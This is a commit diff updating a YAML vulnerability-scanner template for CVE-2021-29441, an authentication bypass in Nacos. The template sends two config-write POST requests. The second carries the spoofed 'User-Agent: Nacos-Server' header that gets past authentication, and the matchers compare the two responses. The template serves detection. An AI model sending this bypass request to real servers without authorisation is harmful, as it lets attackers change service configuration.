template update

2021-05-05 18:23:07 +05:30 · 2021-05-05 18:23:07 +05:30 · 22f123ff79
parent d2ea9d2da0
commit 22f123ff79
1 changed files with 26 additions and 13 deletions
--- a/cves/2021/CVE-2021-29441.yaml
+++ b/cves/2021/CVE-2021-29441.yaml
@ -16,21 +16,34 @@ info:
  tags: nacos,auth-bypass,cve,cve2021

 requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/nacos/v1/cs/configs?dataId=nacos.example&group=com.alibaba.nacos&content=helloWorld"
-    headers:
-      User-Agent: "Nacos-Server"
+  - raw:
+      - |
+        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+      - |
+        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        User-Agent: Nacos-Server
+
+    req-condition: true
    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - "status_code_1 == 403"
+          - "status_code_2 == 200"
+        condition: and
+
+      - type: dsl
+        dsl:
+          - "contains(body_1, 'Forbidden')"
+          - "contains(body_2, 'true')"
+        condition: and
+
      - type: word
        words:
          - "application/json"
-        part: header
-      - type: dsl
-        dsl:
-          - "body == 'true'"
-        part: body
+        part: header